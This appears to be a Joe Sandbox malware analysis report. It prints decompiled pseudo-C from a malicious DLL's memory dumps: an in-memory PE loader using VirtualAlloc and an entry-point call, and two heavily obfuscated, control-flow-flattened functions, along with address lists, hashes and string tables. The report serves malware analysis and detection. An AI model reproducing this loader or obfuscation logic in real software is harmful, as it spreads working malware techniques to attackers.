												_t103 = _t102 + _t146;
											} else {
												_t103 = _t102 + _t108;
											}
											if(_t103 > _t155) {
												_t155 = _t103;
											}
											_t137 = _t137 + 0x28;
											_t154 = _t154 - 1;
										} while (_t154 != 0);
									}
									__imp__GetNativeSystemInfo(_t158 + 0x14); // executed
									_t122 =  *((intOrPtr*)(_t158 + 0x18));
									_t70 =  !(_t122 - 1);
									_t152 =  *((intOrPtr*)(_t149 + 0x50)) + _t122 - 0x00000001 & _t70;
									if(_t152 == (_t122 + _t155 - 0x00000001 & _t70)) {
										_t71 = VirtualAlloc( *(_t149 + 0x34), _t152, 0x3000, 4); // executed
										_t156 = _t71;
										if(_t156 != 0) {
											L19:
											_t73 = HeapAlloc(GetProcessHeap(), 8, 0x34);
											_t153 = _t73;
											if(_t153 != 0) {
												 *(_t153 + 4) = _t156;
												 *((intOrPtr*)(_t153 + 0x1c)) =  *((intOrPtr*)(_t158 + 0x44));
												 *(_t153 + 0x14) = ( *(_t149 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
												 *((intOrPtr*)(_t153 + 0x28)) =  *((intOrPtr*)(_t158 + 0x50));
												 *((intOrPtr*)(_t153 + 0x20)) =  *((intOrPtr*)(_t158 + 0x48));
												 *((intOrPtr*)(_t153 + 0x24)) =  *((intOrPtr*)(_t158 + 0x4c));
												 *((intOrPtr*)(_t153 + 0x30)) =  *((intOrPtr*)(_t158 + 0x18));
												if(E10003D80( *((intOrPtr*)(_t158 + 0x40)),  *(_t149 + 0x54)) == 0) {
													L34:
													E10004470(_t153);
													goto L35;
												} else {
													_t81 = VirtualAlloc(_t156,  *(_t149 + 0x54), 0x1000, 4); // executed
													_t110 = _t81;
													E10003C80(_t110,  *((intOrPtr*)(_t158 + 0x3c)),  *(_t149 + 0x54));
													_t84 =  *((intOrPtr*)(_t158 + 0x48));
													_t131 =  *((intOrPtr*)(_t158 + 0x4c));
													_t158 = _t158 + 0xc;
													_t111 = _t110 +  *((intOrPtr*)(_t84 + 0x3c));
													 *_t153 = _t111;
													 *(_t111 + 0x34) = _t156;
													if(E10003DA0( *((intOrPtr*)(_t158 + 0x1c)), _t84, _t131, _t149, _t153) == 0) {
														goto L34;
													} else {
														_t87 =  *((intOrPtr*)( *_t153 + 0x34)) ==  *(_t149 + 0x34);
														if( *((intOrPtr*)( *_t153 + 0x34)) ==  *(_t149 + 0x34)) {
															 *((intOrPtr*)(_t153 + 0x18)) = 1;
														} else {
															 *((intOrPtr*)(_t153 + 0x18)) = E10004110(_t153, _t87);
														}
														if(E100041A0(_t153) == 0) {
															goto L34;
														} else {
															_push(_t153);
															if(E10003F80( *((intOrPtr*)(_t158 + 0x10))) == 0 || E100040D0(_t153) == 0) {
																goto L34;
															} else {
																_t92 =  *((intOrPtr*)( *_t153 + 0x28));
																if(_t92 == 0) {
																	 *((intOrPtr*)(_t153 + 0x2c)) = 0;
																	return _t153;
																} else {
																	if( *(_t153 + 0x14) == 0) {
																		 *((intOrPtr*)(_t153 + 0x2c)) = _t92 + _t156;
																		return _t153;
																	} else {
																		_push(0);
																		_push(1);
																		_push(0x10000000);
																		if( *((intOrPtr*)(_t156 + _t92))() != 0) {
																			 *((intOrPtr*)(_t153 + 0x10)) = 1;
																			return _t153;
																		} else {
																			SetLastError(0x45a);
																			goto L34;
																		}
																	}
																}
															}
														}
													}
												}
											} else {
												VirtualFree(_t156, _t73, 0x8000);
												goto L21;
											}
										} else {
											_t101 = VirtualAlloc(_t71, _t152, 0x3000, 4); // executed
											_t156 = _t101;
											if(_t156 == 0) {
												L21:
												SetLastError(0xe);
												return 0;
											} else {
												goto L19;
											}
										}
									} else {
										goto L16;
									}
								}
							}
						}
					}
				} else {
					return _t62;
				}
			}

0x10004506
0x1000450f
0x10004513
0x10004515
0x1000451c
0x10004528
0x10004534
0x100045d4
0x100045d9
0x100045e8
0x1000453a
0x1000454e
0x10004760
0x10004769
0x10004554
0x10004557
0x1000455f
0x00000000
0x1000456c
0x1000456c
0x10004572
0x00000000
0x10004574
0x10004578
0x1000457c
0x10004582
0x10004584
0x10004587
0x10004590
0x10004590
0x10004593
0x10004597
0x1000459d
0x10004599
0x10004599
0x10004599
0x100045a1
0x100045a3
0x100045a3
0x100045a5
0x100045a8
0x100045a8
0x10004590
0x100045b2
0x100045b8
0x100045c6
0x100045cc
0x100045d2
0x100045fd
0x100045ff
0x10004603
0x10004616
0x10004621
0x10004627
0x1000462b
0x10004656
0x10004663
0x1000466a
0x10004671
0x10004678
0x1000467b
0x10004682
0x10004695
0x10004756
0x1000475b
0x00000000
0x1000469b
0x100046a7
0x100046ad
0x100046b5
0x100046ba
0x100046c1
0x100046c5
0x100046ca
0x100046d1
0x100046d4
0x100046de
0x00000000
0x100046e0
0x100046e5
0x100046e8
0x100046fa
0x100046ea
0x100046f5
0x100046f5
0x1000470d
0x00000000
0x1000470f
0x10004713
0x1000471b
0x00000000
0x1000472b
0x1000472d
0x10004732
0x10004792
0x100047a0
0x10004734
0x10004738
0x10004782
0x1000478d
0x1000473a
0x1000473a
0x1000473c
0x10004740
0x10004749
0x1000476e
0x1000477c
0x1000474b
0x10004750
0x00000000
0x10004750
0x10004749
0x10004738
0x10004732
0x1000471b
0x1000470d
0x100046de
0x1000462d
0x10004634
0x00000000
0x10004634
0x10004605
0x1000460e
0x10004610
0x10004614
0x1000463a
0x1000463c
0x1000464b
0x00000000
0x00000000
0x00000000
0x10004614
0x00000000
0x00000000
0x00000000
0x100045d2
0x10004572
0x1000455f
0x1000454e
0x10004524
0x10004524
0x10004524

APIs

Part of subcall function 10003D80: SetLastError.KERNEL32(0000000D,1000451A,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000,10003A63,00000000), ref: 10003D8C

GetNativeSystemInfo.KERNEL32(?), ref: 100045B2
SetLastError.KERNEL32(000000C1,00000000,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000,10003A63,00000000), ref: 100045D9

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoNativeSystem
String ID:
API String ID: 3902313427-0
Opcode ID: c6fd34f4addf312a17fd4a0b55a816a8bca61e53f64dce2c2923f383c8579b65
Instruction ID: a884f337d3fb6e3feb3d3e86e5afcf7fae1a1a5031e57e08741fb19a7bb57766
Opcode Fuzzy Hash: c6fd34f4addf312a17fd4a0b55a816a8bca61e53f64dce2c2923f383c8579b65
Instruction Fuzzy Hash: 5681DFB6605706AFE350DF65DC80B67B3E8FF88380F01452DEA4987245EB71E948CB99

Uniqueness

Uniqueness Score: -1.00%

Function 002AC19B, Relevance: 14.0, Strings: 11, Instructions: 269
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E002AC19B() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				void* _t309;
				void* _t312;
				void* _t313;
				void* _t314;
				void* _t318;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				intOrPtr _t330;
				intOrPtr _t337;
				void* _t367;
				signed int* _t371;

				_t371 =  &_v1156;
				_v1092 = 0xf690;
				_v1092 = _v1092 | 0xf7934fb0;
				_v1092 = _v1092 * 0x14;
				_t367 = 0x10587e01;
				_v1092 = _v1092 ^ 0x578fc7fe;
				_v1152 = 0x5ef3;
				_v1152 = _v1152 >> 2;
				_v1152 = _v1152 << 3;
				_v1152 = _v1152 + 0xffffc002;
				_v1152 = _v1152 ^ 0x000040ac;
				_v1044 = 0xa960;
				_v1044 = _v1044 ^ 0xe380f8d6;
				_v1044 = _v1044 ^ 0xe38000ac;
				_v1100 = 0xddeb;
				_v1100 = _v1100 | 0xe721a5ce;
				_v1100 = _v1100 + 0x5324;
				_v1100 = _v1100 ^ 0xe7226746;
				_v1140 = 0x148f;
				_v1140 = _v1140 + 0xffff64ce;
				_v1140 = _v1140 + 0x447f;
				_v1140 = _v1140 << 0xe;
				_v1140 = _v1140 ^ 0xef774fb2;
				_v1060 = 0x55a8;
				_v1060 = _v1060 << 5;
				_v1060 = _v1060 ^ 0x000a886e;
				_v1096 = 0x19da;
				_t320 = 0x6c;
				_v1096 = _v1096 / _t320;
				_v1096 = _v1096 | 0x4d0650db;
				_v1096 = _v1096 ^ 0x4d064557;
				_v1132 = 0x9934;
				_v1132 = _v1132 ^ 0x196601f3;
				_v1132 = _v1132 + 0x3c10;
				_v1132 = _v1132 ^ 0xae304ad8;
				_v1132 = _v1132 ^ 0xb756db0f;
				_v1064 = 0xd974;
				_t321 = 0x3d;
				_v1064 = _v1064 / _t321;
				_v1064 = _v1064 ^ 0x00007e54;
				_v1124 = 0xd3c8;
				_v1124 = _v1124 + 0xffff267a;
				_t322 = 0x56;
				_v1124 = _v1124 * 0x75;
				_v1124 = _v1124 + 0x565b;
				_v1124 = _v1124 ^ 0xfffdaef9;
				_v1088 = 0xe85f;
				_v1088 = _v1088 >> 1;
				_v1088 = _v1088 / _t322;
				_v1088 = _v1088 ^ 0x00001212;
				_v1052 = 0xe21e;
				_v1052 = _v1052 * 0x7a;
				_v1052 = _v1052 ^ 0x006bbadd;
				_v1120 = 0x9501;
				_v1120 = _v1120 + 0xae53;
				_v1120 = _v1120 << 0xf;
				_v1120 = _v1120 + 0xffffb9c9;
				_v1120 = _v1120 ^ 0xa1a9de43;
				_v1072 = 0x5dbc;
				_v1072 = _v1072 >> 0xa;
				_v1072 = _v1072 ^ 0x68683a45;
				_v1072 = _v1072 ^ 0x68687f3b;
				_v1104 = 0xc56b;
				_t323 = 0x4e;
				_v1104 = _v1104 / _t323;
				_v1104 = _v1104 | 0x81a244d4;
				_v1104 = _v1104 ^ 0x81a20643;
				_v1084 = 0xc6fe;
				_v1084 = _v1084 + 0x6c9a;
				_t324 = 0x59;
				_v1084 = _v1084 * 0x59;
				_v1084 = _v1084 ^ 0x006aa8a4;
				_v1144 = 0xbd98;
				_v1144 = _v1144 >> 4;
				_v1144 = _v1144 ^ 0x6fb2eadb;
				_v1144 = _v1144 + 0xffff8c5a;
				_v1144 = _v1144 ^ 0x6fb24f03;
				_v1148 = 0xe45d;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 / _t324;
				_v1148 = _v1148 + 0xffffb3bf;
				_v1148 = _v1148 ^ 0xffffc7fe;
				_v1048 = 0xc28e;
				_t325 = 0x6e;
				_v1048 = _v1048 / _t325;
				_v1048 = _v1048 ^ 0x00003855;
				_v1156 = 0x3cbb;
				_v1156 = _v1156 >> 0xd;
				_v1156 = _v1156 + 0xffffb38b;
				_t326 = 0x37;
				_v1156 = _v1156 * 0x54;
				_v1156 = _v1156 ^ 0xffe6845f;
				_v1068 = 0x7ec2;
				_v1068 = _v1068 * 0x71;
				_v1068 = _v1068 ^ 0x0037ed4e;
				_v1136 = 0xdbee;
				_v1136 = _v1136 | 0x505aaea7;
				_v1136 = _v1136 ^ 0x77b7dc81;
				_v1136 = _v1136 / _t326;
				_v1136 = _v1136 ^ 0x00b99836;
				_v1128 = 0x5a0a;
				_v1128 = _v1128 | 0x4ea2970c;
				_v1128 = _v1128 ^ 0x328e90e9;
				_v1128 = _v1128 + 0x6b4d;
				_v1128 = _v1128 ^ 0x7c2cf483;
				_v1076 = 0x4603;
				_v1076 = _v1076 + 0xf718;
				_v1076 = _v1076 + 0x78d6;
				_v1076 = _v1076 ^ 0x0001cbcf;
				_v1112 = 0x18b3;
				_v1112 = _v1112 << 7;
				_t327 = 0x46;
				_v1112 = _v1112 / _t327;
				_v1112 = _v1112 ^ 0x0000562e;
				_v1056 = 0x27a8;
				_t328 = 0x53;
				_v1056 = _v1056 / _t328;
				_v1056 = _v1056 ^ 0x000057f3;
				_v1108 = 0x1b22;
				_v1108 = _v1108 ^ 0x7ff4b565;
				_v1108 = _v1108 | 0x242e14ec;
				_v1108 = _v1108 ^ 0x7ffeed23;
				_v1116 = 0xa1af;
				_v1116 = _v1116 * 0xc;
				_v1116 = _v1116 >> 2;
				_v1116 = _v1116 + 0x9ff3;
				_v1116 = _v1116 ^ 0x0002cb53;
				_v1080 = 0x7050;
				_v1080 = _v1080 + 0xffffabd1;
				_v1080 = _v1080 + 0xffff67e0;
				_v1080 = _v1080 ^ 0xffff9b11;
				E002A746E(_t328);
				do {
					while(_t367 != 0x102a21de) {
						if(_t367 == 0x10587e01) {
							_t367 = 0x102a21de;
							continue;
						}
						if(_t367 == 0x24244a0a) {
							_push(_v1104);
							_push(_v1072);
							_t313 = E00296ABA(_v1120, 0x2af780, __eflags);
							_t314 = E002A1214();
							_t337 =  *0x2b0724; // 0x340cf0
							E0029EF2E(_t313, __eflags, _v1048, _v1156,  *0x2b0724, _v1068, 0x104,  &_v1040, _v1136, _t337 + 0x238, _t314, _v1128);
							_t268 =  &_v1112; // 0x7e54
							_t312 = E0029F935(_v1076, _t313,  *_t268, _v1056);
							_t371 =  &(_t371[0xe]);
							_t367 = 0x252af45e;
							continue;
						}
						_t377 = _t367 - 0x252af45e;
						if(_t367 != 0x252af45e) {
							goto L10;
						}
						_t318 = E002A533C( &_v520, _v1108, _t377, _v1116, _v1080,  &_v1040); // executed
						return _t318;
					}
					_push(_v1140);
					_push(_v1100);
					_t309 = E00296ABA(_v1044, 0x2af800, __eflags);
					_t330 =  *0x2b0724; // 0x340cf0
					__eflags = _t330 + 0x238;
					E0029F882(_t330 + 0x238, _t309, _v1060, _v1096, _v1132, _v1064, _t330 + 0x238,  &_v520);
					_t312 = E0029F935(_v1124, _t309, _v1088, _v1052);
					_t371 =  &(_t371[0xb]);
					_t367 = 0x24244a0a;
					L10:
					__eflags = _t367 - 0x2cb37c8b;
				} while (__eflags != 0);
				return _t312;
			}

0x002ac19b
0x002ac1a1
0x002ac1ab
0x002ac1bc
0x002ac1c0
0x002ac1c5
0x002ac1cd
0x002ac1d5
0x002ac1da
0x002ac1df
0x002ac1e7
0x002ac1ef
0x002ac1fa
0x002ac205
0x002ac210
0x002ac218
0x002ac220
0x002ac228
0x002ac230
0x002ac238
0x002ac240
0x002ac248
0x002ac24d
0x002ac255
0x002ac25d
0x002ac262
0x002ac26a
0x002ac278
0x002ac27d
0x002ac283
0x002ac28b
0x002ac293
0x002ac29b
0x002ac2a3
0x002ac2ab
0x002ac2b3
0x002ac2bb
0x002ac2c7
0x002ac2cc
0x002ac2d2
0x002ac2da
0x002ac2e2
0x002ac2ef
0x002ac2f0
0x002ac2f4
0x002ac2fc
0x002ac304
0x002ac30c
0x002ac316
0x002ac31a
0x002ac322
0x002ac32f
0x002ac333
0x002ac33b
0x002ac343
0x002ac34b
0x002ac350
0x002ac358
0x002ac360
0x002ac368
0x002ac36d
0x002ac375
0x002ac37d
0x002ac38d
0x002ac392
0x002ac398
0x002ac3a0
0x002ac3a8
0x002ac3b0
0x002ac3bd
0x002ac3c0
0x002ac3c4
0x002ac3cc
0x002ac3d4
0x002ac3d9
0x002ac3e1
0x002ac3e9
0x002ac3f1
0x002ac3f9
0x002ac406
0x002ac40a
0x002ac412
0x002ac41a
0x002ac42c
0x002ac431
0x002ac43a
0x002ac445
0x002ac44d
0x002ac452
0x002ac45f
0x002ac462
0x002ac466
0x002ac46e
0x002ac47b
0x002ac47f
0x002ac487
0x002ac48f
0x002ac497
0x002ac4a7
0x002ac4ab
0x002ac4b3
0x002ac4bb
0x002ac4c3
0x002ac4cb
0x002ac4d3
0x002ac4db
0x002ac4e3
0x002ac4eb
0x002ac4f3
0x002ac4fb
0x002ac503
0x002ac50c
0x002ac511
0x002ac517
0x002ac51f
0x002ac52b
0x002ac52e
0x002ac532
0x002ac53a
0x002ac542
0x002ac54a
0x002ac552
0x002ac55a
0x002ac567
0x002ac56b
0x002ac570
0x002ac578
0x002ac580
0x002ac588
0x002ac590
0x002ac598
0x002ac5a8
0x002ac5bc
0x002ac5bc
0x002ac5ca
0x002ac698
0x00000000
0x002ac698
0x002ac5d2
0x002ac60a
0x002ac613
0x002ac61b
0x002ac62a
0x002ac633
0x002ac670
0x002ac67e
0x002ac689
0x002ac68e
0x002ac691
0x00000000
0x002ac691
0x002ac5d4
0x002ac5d6
0x00000000
0x00000000
0x002ac5f7
0x00000000
0x002ac5fc
0x002ac69f
0x002ac6a8
0x002ac6b3
0x002ac6b8
0x002ac6c7
0x002ac6e9
0x002ac6ff
0x002ac704
0x002ac707
0x002ac709
0x002ac709
0x002ac709
0x00000000

Strings

Mk, xrefs: 002AC4CB
], xrefs: 002AC3F1
T~N7, xrefs: 002AC67E
Pp, xrefs: 002AC580
J$$, xrefs: 002AC5B2
_, xrefs: 002AC304
U8, xrefs: 002AC43A
.V, xrefs: 002AC517
Fg", xrefs: 002AC228
N7, xrefs: 002AC47F
E:hh, xrefs: 002AC36D

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: J$$$.V$E:hh$Fg"$Mk$N7$Pp$T~N7$U8$]$_
API String ID: 0-1810908578
Opcode ID: d2e854b5fc81ed54af10d35e0406af8c02997f603f75f2e7b21c8377ef79f0a5
Instruction ID: b9d4159e3abf210e060091e89f112311bc42239050adac62301add3bc905f88e
Opcode Fuzzy Hash: d2e854b5fc81ed54af10d35e0406af8c02997f603f75f2e7b21c8377ef79f0a5
Instruction Fuzzy Hash: 35D111715083819FE368CF24D58A50BFBE1FBC5708F508A1DF695962A0DBB99919CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0029E360, Relevance: 12.8, Strings: 10, Instructions: 250
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E0029E360() {
				char _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				void* _t246;
				intOrPtr _t250;
				signed int _t251;
				void* _t253;
				signed int _t256;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int* _t280;
				void* _t283;

				_t280 =  &_v616;
				_v616 = 0x938;
				_v616 = _v616 ^ 0x32036c1e;
				_t253 = 0x35b1a35d;
				_v616 = _v616 + 0xff50;
				_v616 = _v616 ^ 0xa41e4e33;
				_v616 = _v616 ^ 0x961a2a59;
				_v612 = 0xdff3;
				_v612 = _v612 | 0xbe472695;
				_v612 = _v612 * 0x78;
				_t278 = 0;
				_v612 = _v612 ^ 0x31bffbe1;
				_v532 = 0x6e1d;
				_v532 = _v532 >> 7;
				_v532 = _v532 ^ 0x00000a14;
				_v564 = 0xff96;
				_v564 = _v564 + 0xffff5f63;
				_v564 = _v564 ^ 0x15bee6b4;
				_v564 = _v564 ^ 0x15bef768;
				_v572 = 0xbf90;
				_v572 = _v572 ^ 0x8dbf6b3a;
				_v572 = _v572 ^ 0xb4b17f40;
				_v572 = _v572 ^ 0x390ee5dd;
				_v592 = 0x9d61;
				_v592 = _v592 ^ 0x6502afb0;
				_v592 = _v592 + 0x4849;
				_v592 = _v592 ^ 0x65024033;
				_v524 = 0xe5fa;
				_v524 = _v524 << 0x10;
				_v524 = _v524 ^ 0xe5fa043a;
				_v560 = 0xfa73;
				_v560 = _v560 + 0xffff8509;
				_v560 = _v560 << 9;
				_v560 = _v560 ^ 0x00fea094;
				_v604 = 0xfa09;
				_t273 = 0x70;
				_v604 = _v604 / _t273;
				_v604 = _v604 + 0x2f57;
				_t274 = 0x74;
				_v604 = _v604 * 0x5e;
				_v604 = _v604 ^ 0x00121f94;
				_v600 = 0x3629;
				_v600 = _v600 >> 2;
				_v600 = _v600 + 0xffff9581;
				_v600 = _v600 >> 9;
				_v600 = _v600 ^ 0x007fa760;
				_v548 = 0x2e8e;
				_v548 = _v548 + 0xffff60e4;
				_v548 = _v548 ^ 0xffff8d3b;
				_v588 = 0xb31d;
				_v588 = _v588 | 0xd642c293;
				_v588 = _v588 << 3;
				_v588 = _v588 ^ 0xb217a161;
				_v584 = 0x4f6f;
				_v584 = _v584 << 6;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 ^ 0x00001065;
				_v580 = 0x9a9f;
				_v580 = _v580 ^ 0x0378d1e4;
				_v580 = _v580 << 9;
				_v580 = _v580 ^ 0xf096f6e0;
				_v576 = 0xa090;
				_v576 = _v576 * 0x12;
				_v576 = _v576 / _t274;
				_v576 = _v576 ^ 0x000043d4;
				_v556 = 0xb0dc;
				_v556 = _v556 | 0x5e6d4122;
				_t275 = 0x13;
				_v556 = _v556 / _t275;
				_v556 = _v556 ^ 0x04f8392e;
				_v540 = 0x3b95;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00003a71;
				_v528 = 0x300a;
				_v528 = _v528 + 0xffffbde9;
				_v528 = _v528 ^ 0xffff9e12;
				_v596 = 0xa76d;
				_v596 = _v596 | 0xfc73e0ba;
				_v596 = _v596 + 0x7ac;
				_t276 = 0x45;
				_v596 = _v596 / _t276;
				_v596 = _v596 ^ 0x03a8fd89;
				_v536 = 0xd61b;
				_v536 = _v536 << 0xe;
				_v536 = _v536 ^ 0x3586f9d3;
				_v544 = 0xec11;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0x0760a93a;
				_v612 = 0x6b8a;
				_v612 = _v612 * 0xc;
				_v612 = _v612 + 0xe792;
				_v612 = _v612 ^ 0x0005ae49;
				_v616 = 0x715a;
				_v616 = _v616 + 0xffff7452;
				_v616 = _v616 << 5;
				_v616 = _v616 | 0xbe8e5d80;
				_v616 = _v616 ^ 0xfffec153;
				_v552 = 0x4309;
				_v552 = _v552 << 9;
				_v552 = _v552 ^ 0x00866d23;
				_t277 = _v552;
				_v568 = 0x8663;
				_v568 = _v568 + 0x76b8;
				_v568 = _v568 * 0x38;
				_v568 = _v568 ^ 0x00385dd7;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t253 - 0x2d2ebb3f;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							_v608 = 0x1852;
							_v608 = _v608 ^ 0xbdd0a054;
							_v608 = _v608 << 8;
							_v608 = _v608 ^ 0xd0b8061c;
							_t240 =  *0x2b0724; // 0x340cf0
							 *((intOrPtr*)(_t240 + 0x228)) = E002A10BE;
							L8:
							_t253 = 0xce138b9;
							continue;
						}
						if(_t253 == 0x30f3286) {
							_t241 = E002A9EEB(_t253, _v524, _v568, _t253, _v560, _v604); // executed
							_t277 = _t241;
							_t280 =  &(_t280[4]);
							__eflags = _t277;
							if(_t277 == 0) {
								_t253 = 0x2d2ebb3f;
							} else {
								_t251 =  *0x2b0724; // 0x340cf0
								 *((intOrPtr*)(_t251 + 0x218)) = 1;
								_t253 = 0x3245856c;
							}
							continue;
						}
						if(_t253 == 0x9276d2c) {
							E0029D2CE();
							_t253 = 0x35f8f7f9;
							continue;
						}
						if(_t253 == 0xce138b9) {
							_push(_t253);
							_t243 =  *0x2b0724; // 0x340cf0
							_t245 = E002A29A0(_v576, _v556, _v540, _t243 + 0x238, _v528, _t253, _v608); // executed
							_t280 =  &(_t280[8]);
							_t253 = 0x9276d2c;
							__eflags = _t245;
							_t246 = 1;
							_t278 =  ==  ? _t246 : _t278;
							continue;
						}
						if(_t253 != 0x177ea9c7) {
							goto L23;
						}
						E002930A4(_t277, _v600, _v548, _v588, _v584); // executed
						_t280 =  &(_t280[3]);
						goto L8;
					}
					__eflags = _t253 - 0x3245856c;
					if(_t253 == 0x3245856c) {
						_v608 = 0xaeea;
						_t253 = 0x177ea9c7;
						_v608 = _v608 * 0x7a;
						_t218 =  &_v608;
						 *_t218 = _v608 ^ 0x00535bad;
						__eflags =  *_t218;
						goto L23;
					}
					__eflags = _t253 - 0x35b1a35d;
					if(_t253 == 0x35b1a35d) {
						_push(_t253);
						_push(_t253);
						_t238 = E002A9E2B(0x448); // executed
						_t280 =  &(_t280[3]);
						 *0x2b0724 = _t238;
						__eflags = _t238;
						if(_t238 == 0) {
							L19:
							return _t278;
						}
						 *((intOrPtr*)(_t238 + 0x224)) = E0029B7F8;
						_t253 = 0x30f3286;
						goto L1;
					}
					__eflags = _t253 - 0x35f8f7f9;
					if(__eflags != 0) {
						goto L23;
					}
					E0029DD94(_v596,  &_v520, __eflags, _t253, _v536, _v544);
					_t250 = E002A8696(_v616,  &_v520, _v552);
					_t256 =  *0x2b0724; // 0x340cf0
					 *((intOrPtr*)(_t256 + 0x444)) = _t250;
					goto L19;
					L23:
					__eflags = _t253 - 0xce35d93;
				} while (_t253 != 0xce35d93);
				goto L19;
			}

0x0029e360
0x0029e366
0x0029e36f
0x0029e376
0x0029e37b
0x0029e382
0x0029e389
0x0029e390
0x0029e398
0x0029e3a9
0x0029e3ad
0x0029e3af
0x0029e3b7
0x0029e3bf
0x0029e3c4
0x0029e3cc
0x0029e3d4
0x0029e3dc
0x0029e3e4
0x0029e3ec
0x0029e3f4
0x0029e3fc
0x0029e404
0x0029e40c
0x0029e414
0x0029e41c
0x0029e424
0x0029e42c
0x0029e434
0x0029e439
0x0029e441
0x0029e449
0x0029e451
0x0029e456
0x0029e45e
0x0029e46c
0x0029e471
0x0029e477
0x0029e484
0x0029e485
0x0029e489
0x0029e491
0x0029e499
0x0029e49e
0x0029e4a6
0x0029e4ab
0x0029e4b3
0x0029e4bb
0x0029e4c3
0x0029e4cb
0x0029e4d3
0x0029e4db
0x0029e4e0
0x0029e4e8
0x0029e4f0
0x0029e4f5
0x0029e4fa
0x0029e502
0x0029e50a
0x0029e512
0x0029e517
0x0029e51f
0x0029e52c
0x0029e536
0x0029e53a
0x0029e542
0x0029e54a
0x0029e55a
0x0029e55f
0x0029e565
0x0029e572
0x0029e57f
0x0029e584
0x0029e58c
0x0029e594
0x0029e59c
0x0029e5a4
0x0029e5ac
0x0029e5b4
0x0029e5c0
0x0029e5c3
0x0029e5c7
0x0029e5cf
0x0029e5d7
0x0029e5dc
0x0029e5e4
0x0029e5ec
0x0029e5f1
0x0029e5f9
0x0029e606
0x0029e60a
0x0029e612
0x0029e61a
0x0029e622
0x0029e62a
0x0029e62f
0x0029e637
0x0029e63f
0x0029e647
0x0029e64c
0x0029e654
0x0029e658
0x0029e660
0x0029e66d
0x0029e671
0x0029e671
0x0029e679
0x0029e679
0x0029e679
0x0029e679
0x0029e67b
0x00000000
0x00000000
0x0029e681
0x0029e755
0x0029e75d
0x0029e765
0x0029e76a
0x0029e772
0x0029e777
0x0029e6c5
0x0029e6c5
0x00000000
0x0029e6c5
0x0029e68d
0x0029e728
0x0029e72d
0x0029e72f
0x0029e732
0x0029e734
0x0029e74e
0x0029e736
0x0029e736
0x0029e73e
0x0029e744
0x0029e744
0x00000000
0x0029e734
0x0029e699
0x0029e708
0x0029e70d
0x00000000
0x0029e70d
0x0029e69d
0x0029e6c9
0x0029e6d3
0x0029e6ee
0x0029e6f3
0x0029e6f6
0x0029e6fb
0x0029e6ff
0x0029e700
0x00000000
0x0029e700
0x0029e6a5
0x00000000
0x00000000
0x0029e6bd
0x0029e6c2
0x00000000
0x0029e6c2
0x0029e786
0x0029e78c
0x0029e82d
0x0029e835
0x0029e83f
0x0029e843
0x0029e843
0x0029e843
0x00000000
0x0029e843
0x0029e792
0x0029e798
0x0029e801
0x0029e802
0x0029e808
0x0029e80d
0x0029e810
0x0029e815
0x0029e817
0x0029e7e5
0x0029e7f0
0x0029e7f0
0x0029e819
0x0029e823
0x00000000
0x0029e823
0x0029e79a
0x0029e7a0
0x00000000
0x00000000
0x0029e7b7
0x0029e7d0
0x0029e7d5
0x0029e7de
0x00000000
0x0029e84b
0x0029e84b
0x0029e84b
0x00000000

Strings

Zq, xrefs: 0029E61A
IH, xrefs: 0029E41C
C, xrefs: 0029E63F
q:, xrefs: 0029E584
0, xrefs: 0029E58C
,m', xrefs: 0029E6F6
)6, xrefs: 0029E491
"Am^, xrefs: 0029E54A
,m', xrefs: 0029E693
oO, xrefs: 0029E4E8

Memory Dump Source

